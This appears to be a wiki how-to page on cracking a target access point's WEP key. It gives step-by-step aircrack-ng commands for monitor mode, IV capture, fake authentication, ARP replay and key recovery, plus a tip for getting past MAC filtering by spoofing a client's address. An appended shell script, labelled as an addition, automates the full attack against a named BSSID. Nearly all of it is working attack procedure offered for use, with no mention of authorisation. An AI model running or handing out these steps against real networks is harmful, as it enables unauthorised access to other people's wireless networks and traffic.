Cracking A WEP Key

From Nearline Storage


  • Install the kismet, kismet-plugins and aircrack-ng packages
  • Use kismet to find the channel, ESSID and BSSID of the target access point, and confirm it is actually running WEP (this attack does not apply to WPA/WPA2)

The aircrack-ng tools are fussy about MAC addresses: give them in full colon-separated form, keep the leading zeros in every group (00:0A:…, not 0:A:…) and use uppercase hex digits, exactly as kismet shows them.

  • Become root:
 su -
  • Put the NIC into monitor mode (airmon-ng prints the name of the monitor interface it creates: older releases call it mon0, newer ones wlan0mon, so substitute whatever name it reports in the commands below):
 airmon-ng start wlan0
  • Start capturing packets, restricted to the target AP and saving only the IVs (airodump-ng numbers its output files, so this writes dumpfile-01.ivs and dumpfile-01.csv):
 airodump-ng -w dumpfile --ivs --bssid <BSSid> --channel <channel> mon0

If the #Data column for the access point climbs too slowly on its own, start a new terminal session and generate traffic yourself:

  • Associate with the target AP (fake authentication; -h is the MAC address of your own wireless card, and 00:01:02:03:04:05 below is only a placeholder for it):
 aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0

If that doesn't associate successfully, the AP may have MAC filtering turned on. Watch the airodump-ng output for a while until you see a client associate successfully, take its MAC address, set your card to that address (for example with macchanger) and substitute it for -h in both aireplay-ng commands.

  • Start replaying captured ARP requests so that the AP answers with fresh IVs (-b is the target BSSID, -h the same source MAC used for the fake authentication):
 aireplay-ng -3 -b <BSSid> -h 00:01:02:03:04:05 mon0

Watch the #Data column in the airodump-ng session: that is the count of captured IVs. Aim for more than 100,000 unique IVs; aircrack-ng 1.x uses the PTW attack, which usually recovers a 128-bit key with far fewer, so you can try cracking earlier and simply keep collecting if it fails.

  • Ctrl-C the dump process and crack the key (or leave airodump-ng running and point aircrack-ng at the file it is still writing, since aircrack-ng re-reads it):
 aircrack-ng dumpfile-01.ivs
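The steps above as one script, added here as an example and not part of the original page. It assumes aircrack-ng 1.x (airodump-ng, aireplay-ng and aircrack-ng in PATH), a monitor interface already created with airmon-ng, and root. The two helpers normalize_mac (the MAC formatting rule from the top of the page) and iv_count (reading the "# IV" column out of the CSV airodump-ng writes next to the capture) run offline against a constructed sample; the tools themselves are only invoked by run_attack when the script is started with the word run. The file name wepcrack.sh and the sample CSV are assumptions.

```shell
#!/bin/sh
# Added example for the WEP procedure on this page (not the page's own code).
# Usage: sh wepcrack.sh run <mon-iface> <channel> <ESSID> <BSSID> <our-MAC> [prefix]
# Assumes aircrack-ng 1.x in PATH, a monitor interface from airmon-ng, and root.

IV_TARGET=100000   # stop replaying once airodump-ng has logged this many IVs

# Normalise a MAC to the form the aircrack-ng tools want: six colon-separated
# two-digit groups, leading zeros kept, uppercase hex. Accepts '-' separators
# and single-digit groups; prints nothing and returns 1 on anything else.
normalize_mac() {
    raw=$(printf '%s' "$1" | tr 'abcdef-' 'ABCDEF:')
    out='' n=0 oldifs=$IFS
    IFS=':'
    for group in $raw; do
        case "$group" in
            [0-9A-F])         group="0$group" ;;
            [0-9A-F][0-9A-F]) ;;
            *) IFS=$oldifs; return 1 ;;
        esac
        out="${out:+$out:}$group"
        n=$((n + 1))
    done
    IFS=$oldifs
    [ "$n" -eq 6 ] || return 1
    printf '%s\n' "$out"
}

# Print the "# IV" column (11th field) for one BSSID from an airodump-ng CSV
# (written as <prefix>-01.csv beside the capture) read on stdin; 0 if absent.
iv_count() {
    awk -F', *' -v bssid="$1" '
        $1 == bssid { print $11; found = 1; exit }
        END         { if (!found) print 0 }'
}

# Constructed sample (not captured from a real AP) in the column layout
# airodump-ng writes, used to exercise iv_count without any hardware.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:BB:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6, 54, WEP, WEP, , -41, 310, 28, 0.0.0.0, 6, target, 
02:00:00:AA:BB:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 54, WEP, WEP, , -63, 295, 104231, 0.0.0.0, 5, other, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:CC:DD:01, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50, 12, 02:00:00:AA:BB:01, target'

# $1 = csv path, $2 = BSSID; reports 0 until airodump-ng has written the file.
current_ivs() {
    if [ -r "$1" ]; then iv_count "$2" < "$1"; else echo 0; fi
}

# True once the IV count has reached IV_TARGET.
enough_ivs() {
    [ "$1" -ge "$IV_TARGET" ]
}

run_attack() {
    iface=$1 channel=$2 essid=$3 prefix=${6:-dumpfile}
    bssid=$(normalize_mac "$4") || { echo "bad BSSID: $4" >&2; return 1; }
    mymac=$(normalize_mac "$5") || { echo "bad source MAC: $5" >&2; return 1; }

    # Capture only this AP and only the IVs: <prefix>-01.ivs and <prefix>-01.csv.
    airodump-ng --ivs --bssid "$bssid" --channel "$channel" -w "$prefix" "$iface" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5

    # Fake authentication (attack -1), then ARP request replay (attack -3).
    aireplay-ng -1 0 -e "$essid" -a "$bssid" -h "$mymac" "$iface" || { kill "$dump_pid"; return 1; }
    aireplay-ng -3 -b "$bssid" -h "$mymac" "$iface" >/dev/null 2>&1 &
    replay_pid=$!

    until enough_ivs "$(current_ivs "$prefix-01.csv" "$bssid")"; do
        echo "IVs so far: $(current_ivs "$prefix-01.csv" "$bssid")"
        sleep 10
    done
    kill "$replay_pid" "$dump_pid"
    aircrack-ng "$prefix-01.ivs"
}

case "${1:-}" in
    run) shift; run_attack "$@" ;;
esac
```

If the fake authentication fails because of MAC filtering, set the card to an associated client's MAC first (as described above) and pass that address as the our-MAC argument; the script feeds the same normalised address to both aireplay-ng invocations, which is what the ARP replay needs.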